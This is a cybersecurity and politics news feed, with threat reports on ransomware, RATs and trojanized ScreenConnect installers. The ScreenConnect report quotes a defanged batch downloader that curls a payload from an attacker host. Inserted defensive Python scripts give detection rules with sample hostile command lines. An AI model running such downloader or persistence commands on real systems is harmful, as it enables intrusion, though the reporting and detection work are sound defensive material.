• President Donald Trump signed an executive order Friday to rename the Department of Defense as the Department of War.

    Just before Trump signed the order in the Oval Office late Friday afternoon, he and Pete Hegseth, the secretary in charge of the department, who stood next to Trump during the signing, said the renaming reflected their intention to return to a more aggressive mindset for the military.

    “It's restoring, as you've guided us to, Mr. President, restoring the warrior ethos,” Hegseth said. “The War Department is going to fight decisively, not endless conflicts. It's going to fight to win, not not to lose. We're going to go on offense, not just on defense. Maximum lethality, not tepid legality. Violent effect, not politically correct. We're going to raise up warriors, not just defenders.”

    The text of the order calls "Secretary of War" a "secondary" title for Hegseth. "The Secretary of Defense is authorized the use of this additional secondary title — the Secretary of War — and may be recognized by that title in official correspondence, public communications, ceremonial contexts, and non-statutory documents within the executive branch," reads the order.

    The Department of War and the Department of the Navy were Cabinet departments from the nation's founding until 1947, when Congress combined them, along with the Department of the Air Force, into a new National Military Establishment. Congress changed that name to the Defense Department two years later.

    Trump said Friday that the renaming 76 years ago revealed a “political correctness” in the military that contributed to poorer results on the battlefield. The U.S. has not won a major war since the reorganization, he said.

    “We could have won every war, but we really chose to be very politically correct or wokey, and we just fight forever and then, we wouldn't lose, really, we just fight to sort of tie,” he said. “We never wanted to win wars that every one of them we would have won easily with just a couple of little changes or a couple of little edicts.”

    Because the department’s name came from an act of Congress, it’s unclear if Trump has the power to rename it with an executive order. 

    The president said Friday he didn’t know if it would be necessary for Congress to be involved, but that he would ask lawmakers to approve the change.

    “I don't know, but we're going to find out,” he said when asked if Congress would codify the renaming. “But I'm not sure they have to … There's a question as to whether or not they have to, but we'll put it before Congress.”

    Trump added that the cost of replacing signage and other materials associated with the department would be minimal.

    The order says: "Within 60 days of the date of this order, the Secretary of War shall submit to the President, through the Assistant to the President for National Security Affairs, a recommendation on the actions required to permanently change the name of the Department of Defense to the Department of War. This recommendation shall include the proposed legislative and executive actions necessary to accomplish this renaming."

    Sen. Mitch McConnell of Kentucky, the chair of the Appropriations subcommittee with jurisdiction over the department, who has often clashed with Trump, including on defense spending, said on social media that the name change was not meaningful without greater financial investment.

    “If we call it the Dept. of War, we'd better equip the military to actually prevent and win wars,” the former Senate Republican leader wrote. “Can't preserve American primacy if we're unwilling to spend substantially more on our military than Carter or Biden. ‘Peace through strength’ requires investment, not just rebranding.”

    This story was originally published by Stateline.


  • A recent investigation has revealed that Microsoft employed China-based engineers to maintain and support SharePoint software, the same collaboration platform that was recently compromised by Chinese state-sponsored hackers.

    This revelation raises significant concerns about cybersecurity practices and potential insider threats within critical infrastructure systems used by hundreds of government agencies and private companies.

    The cybersecurity incident, which Microsoft disclosed last month, involved sophisticated attacks on SharePoint “OnPrem” installations beginning as early as July 7, 2025.

    Chinese hackers successfully exploited vulnerabilities in the on-premises version of SharePoint, gaining unauthorized access to computer systems across multiple high-profile targets, including the National Nuclear Security Administration and the Department of Homeland Security.

    The attack demonstrated advanced persistent threat capabilities, with hackers maintaining access even after Microsoft’s initial security patch on July 8.

    ProPublica analysts identified the concerning operational structure through internal Microsoft work-tracking system screenshots, revealing that China-based engineering teams had been responsible for SharePoint maintenance and bug fixes for several years.

    This discovery adds a troubling dimension to the security breach, as the same personnel tasked with maintaining the software’s integrity may have inadvertently created vulnerabilities that adversaries could exploit.

    The technical scope of the vulnerability was extensive, with the U.S. Cybersecurity and Infrastructure Security Agency confirming that the exploits enabled attackers to “fully access SharePoint content, including file systems and internal configurations, and execute code over the network.”

    The attack vector allowed for remote code execution, effectively granting hackers administrative privileges over compromised systems.

    Persistence and Evasion Mechanisms

    The SharePoint exploit demonstrated sophisticated persistence tactics that allowed attackers to maintain access even after initial remediation efforts.

    When Microsoft released the first security patch on July 8, the threat actors quickly adapted their methods to bypass the new protections, forcing the company to develop additional “more robust protections” in subsequent patches.

    The persistence mechanism likely involved embedding malicious code within SharePoint’s configuration files and leveraging the platform’s extensive file system access capabilities.

    Attackers could establish backdoors by modifying authentication modules or creating hidden administrative accounts within the SharePoint infrastructure. This approach enabled sustained access to sensitive government and corporate data while remaining undetected by standard security monitoring tools.

    Microsoft has acknowledged the security implications and announced plans to relocate China-based support operations to alternative locations.

    The company emphasized that all work was conducted under U.S.-based supervision with mandatory security reviews, though experts question whether such oversight measures adequately mitigate the inherent risks of foreign personnel handling sensitive system maintenance.


    The post New Report Claims Microsoft Used China-Based Engineers For SharePoint Support and Bug Fixing appeared first on Cyber Security News.


  • Cybercriminals unleashed a massive wave of mobile malware attacks during the second quarter of 2025, with security researchers detecting nearly 143,000 malicious installation packages targeting Android and iOS devices.

    This surge represents a significant escalation in mobile cyber threats, affecting millions of users worldwide through sophisticated attack vectors designed to steal sensitive data, compromise financial information, and establish persistent backdoors on infected devices.

    The malware landscape during Q2 2025 demonstrated remarkable diversity in both attack methodologies and target demographics.

    Banking Trojans emerged as the dominant threat category, accounting for 42,220 malicious packages, while mobile ransomware Trojans contributed an additional 695 packages to the threat ecosystem.

    The attacks primarily leveraged social engineering tactics, fake application stores, and compromised legitimate applications to infiltrate user devices, with cybercriminals showing increasing sophistication in bypassing modern security mechanisms.

    Fake app store page distributing SparkKitty (Source – Securelist)

    According to Kaspersky Security Network data, the quarter witnessed 10.71 million blocked attacks involving malware, adware, and unwanted mobile software.

    Trojans represented the most prevalent threat type, comprising 31.69% of all detected malicious activities.

    Securelist researchers identified several concerning trends, including the emergence of pre-installed malware on certain device models and the evolution of existing threat families to incorporate new evasion techniques.

    Among the most notable discoveries was the SparkKitty malware, a sophisticated threat targeting both Android and iOS platforms with image-stealing capabilities.

    This malicious application specifically targeted cryptocurrency wallet recovery codes stored as screenshots in device galleries, representing a direct threat to digital asset security.

    The malware operated by masquerading as legitimate applications while secretly exfiltrating sensitive visual data to remote servers controlled by cybercriminals.

    Advanced Persistence and Evasion Mechanisms

    The technical sophistication of Q2 2025 mobile malware reached unprecedented levels, particularly in persistence and detection evasion strategies.

    The Trojan-Spy.AndroidOS.OtpSteal.a exemplified this evolution by disguising itself as a Virtual Private Network client while implementing the Notification Listener service to intercept one-time password codes from messaging applications and social networks.

    This approach allowed attackers to bypass two-factor authentication mechanisms by automatically forwarding intercepted codes to Telegram channels via automated bots.
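    The OtpSteal.a description above pairs a VPN-client disguise with a notification listener, which is exactly the combination a static manifest check can surface before an app is trusted. The script below is an added example, not code from Securelist or Kaspersky: it parses a decoded AndroidManifest.xml (assumed already extracted from the APK with a tool such as apktool; the sample manifest is constructed for this example) and flags any app that declares a NotificationListenerService, escalating when that listener sits beside a VPN service.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
NOTIFICATION_LISTENER_ACTION = "android.service.notification.NotificationListenerService"
VPN_SERVICE_ACTION = "android.net.VpnService"

# Constructed sample manifest (not a real sample): a "VPN" app that also binds
# a notification listener, the combination described for OtpSteal.a above.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.fakevpn">
  <uses-permission android:name="android.permission.INTERNET"/>
  <application android:label="Fast VPN">
    <service android:name=".VpnTunnel"
             android:permission="android.permission.BIND_VPN_SERVICE">
      <intent-filter>
        <action android:name="android.net.VpnService"/>
      </intent-filter>
    </service>
    <service android:name=".NotifListener"
             android:permission="android.permission.BIND_NOTIFICATION_LISTENER_SERVICE">
      <intent-filter>
        <action android:name="android.service.notification.NotificationListenerService"/>
      </intent-filter>
    </service>
  </application>
</manifest>
"""


def declared_service_actions(manifest_xml):
    """Return {service name: set of intent-filter actions} from a decoded manifest."""
    root = ET.fromstring(manifest_xml)
    # Manifest attributes live in the android namespace, element tags do not.
    name_attr = "{%s}name" % ANDROID_NS
    services = {}
    for svc in root.iter("service"):
        services[svc.get(name_attr)] = {a.get(name_attr) for a in svc.iter("action")}
    return services


def triage(manifest_xml):
    """Flag manifests where a notification listener sits beside a VPN service."""
    services = declared_service_actions(manifest_xml)
    listeners = sorted(n for n, acts in services.items() if NOTIFICATION_LISTENER_ACTION in acts)
    vpn_fronts = sorted(n for n, acts in services.items() if VPN_SERVICE_ACTION in acts)
    findings = []
    if listeners:
        # Any listener can read OTP notifications; this alone deserves a look.
        findings.append("notification_listener:" + ",".join(listeners))
    if listeners and vpn_fronts:
        # A VPN front plus a listener matches the disguise described above.
        findings.append("vpn_front_with_listener:" + ",".join(vpn_fronts))
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_MANIFEST):
        print(finding)
```

    A notification listener is legitimate for smartwatch companions and accessibility tools, so the check is a triage signal rather than a verdict; the point is that a VPN client has no plausible reason to bind one.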

    The malware’s persistence mechanisms involved deep system integration, with samples like Trojan-DDoS.AndroidOS.Agent.a embedding malicious Software Development Kits directly into adult content viewing applications.

    This integration technique enabled the creation of distributed denial-of-service botnets from compromised mobile devices, demonstrating how cybercriminals are adapting traditional attack methodologies for mobile platforms.

    The embedded SDK allowed for dynamic configuration of attack parameters, including target addresses and transmission frequencies, providing attackers with flexible command and control capabilities.


    The post 143,000 Malware Files Attacked Android and iOS Device Users in Q2 2025 appeared first on Cyber Security News.


  • A new ransomware threat has emerged as one of 2025’s most prolific cybercriminal operations, with SafePay ransomware claiming attacks against 73 victim organizations in June alone, followed by 42 additional victims in July.

    This surge has positioned SafePay as a significant threat actor that security teams worldwide must understand and prepare to defend against.

    Unlike traditional ransomware-as-a-service (RaaS) models that rely on affiliate networks, SafePay operates as a closed, independent group that maintains strict operational security.

    The group’s rapid-fire attack methodology has proven remarkably effective, with more than 270 claimed victims documented throughout 2025.

    Their operations target primarily mid-size and enterprise organizations across the United States, Germany, Great Britain, and Canada, focusing on industries critical to daily operations including manufacturing, healthcare, and construction.

    Most affected industries (Source – Bitdefender)

    The group’s emergence can be traced back to September 2024, arising in the aftermath of significant law enforcement operations that dismantled ALPHV (Black Cat) and severely disrupted LockBit’s infrastructure through Operation Cronos.

    Bitdefender analysts identified parts of the SafePay ransomware that complement functionalities associated with LockBit, specifically LockBit Black, though the groups operate with distinctly different methodologies and encryption processes.

    SafePay demonstrates an alarming capability to execute complete attack chains within 24-hour periods, moving from initial access through encryption with devastating efficiency.

    SafePay’s Victims Claimed Per Day (Source – Bitdefender)

    Their victim selection appears methodical, targeting organizations with revenues typically around $5 million, though outliers include entities with revenues exceeding $100 million and one victim surpassing $40 billion in revenue.

    Encryption and Evasion Mechanisms

    SafePay employs sophisticated technical approaches that distinguish it from other ransomware families.

    The malware utilizes the ChaCha20 encryption algorithm, implementing unique symmetric keys for each encrypted file while embedding additional keys directly within the ransomware executable.

    This dual-key approach complicates recovery efforts and ensures that each victim’s encryption remains uniquely secured.

    The ransomware demonstrates advanced defense evasion capabilities, including debugger detection avoidance and the ability to terminate processes associated with anti-malware functions.

    Upon execution, SafePay immediately begins removing volume shadow copies to prevent system restoration, then proceeds to encrypt files with the .safepay extension while deploying ransom notes named “readme_safepay.txt” in affected directories.

    One notable technical characteristic involves the malware’s geographic targeting logic.

    SafePay inspects the installed keyboard layouts and refuses to run on systems with a Cyrillic layout, a behaviour that suggests Russian connections or alliances within the threat actor ecosystem.


    The post SafePay Ransomware Claiming Attacks Over 73 Victim Organizations in a Single Month appeared first on Cyber Security News.


  • A sophisticated new threat actor designated TAG-150 has emerged as a significant cybersecurity concern, demonstrating rapid development capabilities and technical sophistication in deploying multiple self-developed malware families since March 2025.

    The group has successfully created and deployed CastleLoader, CastleBot, and their latest creation, CastleRAT, a previously undocumented remote access trojan that represents a concerning evolution in their operational capabilities.

    The threat actor primarily initiates infections through Cloudflare-themed “ClickFix” phishing attacks and fraudulent GitHub repositories masquerading as legitimate applications.

    Victims are deceived into copying and executing malicious PowerShell commands on their own devices, creating a seemingly user-initiated compromise that bypasses traditional security measures.

    Despite limited overall engagement, the campaign achieved a remarkable 28.7% infection rate among victims who interacted with malicious links, demonstrating the effectiveness of their social engineering tactics.

    Recorded Future analysts identified an extensive multi-tiered infrastructure supporting TAG-150’s operations, revealing a sophisticated command-and-control architecture spanning four distinct tiers.

    The infrastructure includes victim-facing Tier 1 servers hosting various malware families, intermediate Tier 2 servers accessed via RDP, and higher-level Tier 3 and Tier 4 infrastructure used for operational management and backup purposes.

    This complex network design suggests advanced operational security awareness and redundancy planning.

    The malware ecosystem deployed by TAG-150 serves as an initial infection vector for delivering secondary payloads including SectopRAT, WarmCookie, HijackLoader, NetSupport RAT, and numerous information stealers such as Stealc, RedLine Stealer, and Rhadamanthys Stealer.

    Multi-tiered infrastructure linked to TAG-150 (Source – Recorded Future)

    This diverse payload delivery capability indicates either a Malware-as-a-Service operation or strategic partnerships with other cybercriminal groups.

    Advanced Persistence and Evasion Mechanisms

    CastleRAT represents the most technically advanced component of TAG-150’s arsenal, available in both Python and C variants with distinct capabilities.

    The malware employs a custom binary protocol utilizing RC4 encryption with hard-coded 16-byte keys for secure communications.

    Both variants query the geolocation API ip-api.com to obtain location information through the infected host’s public IP address, enabling geographic targeting and operational intelligence gathering.

    The C variant demonstrates significantly enhanced functionality, incorporating keylogging capabilities, screen capturing, clipboard monitoring, and sophisticated process injection techniques.

    Recent developments include the implementation of C2 dead drops hosted on Steam Community pages, representing an innovative approach to command-and-control communications that leverages legitimate gaming platforms to evade detection.

    The malware maintains persistence through registry modifications and employs browser process masquerading for execution, while the Python variant includes self-deletion capabilities using PowerShell commands.

    These evasion techniques, combined with the group’s use of anti-detection services like Kleenscan, demonstrate TAG-150’s commitment to operational longevity and stealth.


    The post TAG-150 Hackers Deploying Self-Developed Malware Families to Attack Organizations appeared first on Cyber Security News.


  • A sophisticated cyber campaign has emerged targeting U.S.-based organizations through trojanized ConnectWise ScreenConnect installers, marking a significant evolution in remote monitoring and management (RMM) tool abuse.

    Since March 2025, these attacks have demonstrated increased frequency and technical sophistication, leveraging legitimate administrative software to establish persistent footholds within corporate networks.

    The campaign employs deceptive social engineering tactics, distributing malicious installers disguised as official documents such as “agreement_support-pdf[.]Client[.]exe” and “Social_Security_Statement_Documents_386267[.]exe.”

    These files appear to be legitimate support materials or financial documents, exploiting user trust to gain initial system access.

    Once executed, the installers establish connections to attacker-controlled servers, effectively turning victims’ machines into remotely accessible assets.

    What distinguishes this campaign from previous ScreenConnect abuse is the deployment of ClickOnce runner installers rather than traditional full installers.

    Acronis researchers identified that these evolved installers lack embedded configuration data, instead fetching components and settings at runtime from compromised infrastructure.

    This architectural change significantly complicates detection efforts, as traditional static analysis methods that rely on identifying suspicious embedded configurations become ineffective.

    The threat actors demonstrate remarkable operational complexity by simultaneously deploying multiple remote access trojans (RATs) on compromised systems.

    Within minutes of ScreenConnect installation, automated processes deploy both the well-documented AsyncRAT and a custom PowerShell-based RAT developed specifically for these campaigns.

    This dual-deployment strategy suggests either redundancy planning or shared infrastructure among multiple threat groups.

    Advanced Infection Chain Analysis

    The technical sophistication of this campaign becomes apparent through examination of its multi-stage infection process.

    The complete infection chain of AsyncRAT (Source – Acronis)

    The initial ClickOnce installer connects to attacker infrastructure using parameters such as “e=Support&y=Guest&h=morco[.]rovider[.]net&p=8041,” establishing communication with command-and-control servers hosted on compromised virtual private servers.

    Following successful installation, the malware leverages ScreenConnect’s built-in automation capabilities to execute a batch file designated as “BypaasaUpdate[.]bat.”

    This initial payload functions as a sophisticated downloader, retrieving a compressed archive containing multiple encoded components:

    set LINK=https[:]//guilloton[.]fr/x[.]zip
    set ZIP_PATH=%ProgramData%\ali[.]zip
    curl -s -o "%ZIP_PATH%" %LINK%

    The downloaded archive contains strategically named files including “1[.]txt” (containing AsyncRAT), “pe[.]txt” (AMSI bypass mechanisms), and “Skype[.]ps1” (PowerShell execution script).

    This naming convention represents deliberate obfuscation designed to evade signature-based detection systems.

    The persistence mechanism demonstrates particular ingenuity, establishing scheduled tasks that execute every minute while implementing mutex checking to prevent duplicate instances.

    The PowerShell script “Skype[.]ps1” loads encoded .NET assemblies directly into memory, bypassing traditional file-based detection methods while maintaining continuous system access for threat actors.
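    The chain described above leaves a recognisable sequence in process-creation telemetry: the ScreenConnect client service spawning a shell, a built-in download utility writing into ProgramData, and a scheduled task registered with a one-minute cadence. The script below is an added example, not code from Acronis or from the campaign: it replays constructed Sysmon-style records (the host names, field layout and the placeholder download URL are assumptions for the example; the file names come from the report) through three rules and reports hosts that trip more than one, since any single rule fires on benign administration now and then.

```python
import re
from collections import defaultdict

# Constructed process-creation records for this example (not real telemetry):
# "host|parent_image|image|command_line"
SAMPLE_EVENTS = [
    "ws01|C:\\Program Files (x86)\\ScreenConnect Client\\ScreenConnect.ClientService.exe"
    "|C:\\Windows\\System32\\cmd.exe|cmd.exe /c C:\\ProgramData\\BypaasaUpdate.bat",
    "ws01|C:\\Windows\\System32\\cmd.exe|C:\\Windows\\System32\\curl.exe"
    "|curl -s -o \"C:\\ProgramData\\ali.zip\" https://dropsite.invalid/x.zip",
    "ws01|C:\\Windows\\System32\\cmd.exe|C:\\Windows\\System32\\schtasks.exe"
    "|schtasks /create /sc minute /mo 1 /tn Updater /tr \"powershell -w hidden -File C:\\ProgramData\\Skype.ps1\"",
    "ws02|C:\\Windows\\explorer.exe|C:\\Windows\\System32\\notepad.exe|notepad.exe C:\\Users\\bob\\notes.txt",
]


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def rule_rmm_spawns_shell(parent, image, cmdline):
    # The RMM client service should rarely launch a shell itself.
    if _basename(parent) == "screenconnect.clientservice.exe" and _basename(image) in ("cmd.exe", "powershell.exe"):
        return "rmm_spawns_shell"
    return None


def rule_download_to_programdata(parent, image, cmdline):
    # Built-in download utilities writing into ProgramData, as the downloader above does.
    if _basename(image) in ("curl.exe", "certutil.exe", "bitsadmin.exe") and re.search(r"\\programdata\\", cmdline, re.I):
        return "download_to_programdata"
    return None


def rule_minute_scheduled_task(parent, image, cmdline):
    # A task repeating every minute is the persistence cadence described above.
    if _basename(image) == "schtasks.exe" and re.search(r"/sc\s+minute\s+/mo\s+1\b", cmdline, re.I):
        return "minute_scheduled_task"
    return None


RULES = (rule_rmm_spawns_shell, rule_download_to_programdata, rule_minute_scheduled_task)


def detect(records):
    """Return {host: [tags...]} for hosts that triggered at least one rule."""
    findings = defaultdict(list)
    for rec in records:
        host, parent, image, cmdline = rec.split("|", 3)
        for rule in RULES:
            tag = rule(parent, image, cmdline)
            if tag:
                findings[host].append(tag)
    return dict(findings)


def suspicious_hosts(records, min_distinct=2):
    """Hosts with at least min_distinct different tags; one hit alone is noisy."""
    return sorted(h for h, tags in detect(records).items() if len(set(tags)) >= min_distinct)


if __name__ == "__main__":
    for host, tags in detect(SAMPLE_EVENTS).items():
        print(host, tags)
    print("suspicious:", suspicious_hosts(SAMPLE_EVENTS))
```

    The rules key on parent-child relationships and command-line shape rather than on the file names from this campaign, so a renamed batch file or a different archive name still trips them; the file names in the sample records only make the replay readable.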

    This campaign represents a concerning evolution in RMM tool weaponization, combining legitimate software abuse with sophisticated evasion techniques to establish persistent organizational access.


    The post Threats Actors Weaponize ScreenConnect Installers to Gain Initial Access to Organizations appeared first on Cyber Security News.


  • Canadian fintech giant Wealthsimple announced today that it has suffered a data breach, resulting in the unauthorized access of personal information belonging to a small fraction of its client base. The company stressed that all funds and accounts remain secure and that no passwords were compromised in the incident.

    In a statement released Friday, Wealthsimple confirmed that the security incident was first detected on August 30th. The breach was traced back to a compromised software package created by a trusted third-party vendor.

    The company reported that its security team, with assistance from external experts, contained the issue within a few hours of detection.

    Wealthsimple Data Breach

    According to Wealthsimple, the breach impacted “less than 1% of our clients.” The exposed data includes sensitive personal information such as contact details, government-issued IDs provided during sign-up, financial account numbers, Social Insurance Numbers (SIN), dates of birth, and IP addresses. The firm reiterated that no client funds were accessed or stolen during the brief period of unauthorized access.

    Wealthsimple has already notified all affected individuals via email. In its public notice, the company stated, “If you did not receive an email from us about this, your data was not impacted. All emails have been sent as of 10:30 AM EST on September 5th.”

    As part of its response, the company is offering two years of complimentary credit and dark-web monitoring services, along with identity theft protection and insurance, to every client whose data was involved.

    A dedicated support team has also been established to handle inquiries from those affected. Wealthsimple confirmed it has reported the incident to all applicable privacy and financial regulators.

    “We take the trust you put in us very seriously,” the company’s statement read. “We apologize to those clients whose data was accessed – and to all our clients, because threats to personal data can cause a lot of anxiety.”

    While Wealthsimple has already enhanced its internal security protections against similar threats, it is urging all users to adopt additional security measures.

    The company strongly recommends enabling two-factor authentication (2FA) with an authenticator app, remaining vigilant for potential phishing scams impersonating the company, and using strong, unique passwords for all online accounts.


    The post Wealthsimple Data Breach Exposes Personal Information of Some Users appeared first on Cyber Security News.


  • A new investigation has revealed that Microsoft relied on China-based engineers to provide technical support and bug fixes for SharePoint, the same collaboration software that was recently exploited by Chinese state-sponsored hackers in a massive cyberattack affecting hundreds of organizations, including sensitive U.S. government agencies. Last month, Microsoft announced that Chinese hackers had successfully exploited […]

    The post Microsoft Tapped China Engineers for SharePoint Support appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • In the second quarter of 2025, users of Android and iOS devices faced relentless cyberthreats, with Kaspersky Security Network reporting nearly 143,000 malicious installation packages detected across its mobile security products. Although the overall number of mobile attacks—including malware, adware, and potentially unwanted software—dropped to 10.71 million in Q2, Trojans remained the predominant danger, accounting […]

    The post Over 143,000 Malware Files Target Android and iOS Users in Q2 2025 appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • Federal Civilian Executive Branch (FCEB) agencies are being advised to update their Sitecore instances by September 25, 2025, following the discovery of a security flaw that has come under active exploitation in the wild. The vulnerability, tracked as CVE-2025-53690, carries a CVSS score of 9.0 out of a maximum of 10.0, indicating critical severity. “Sitecore Experience Manager (XM), Experience
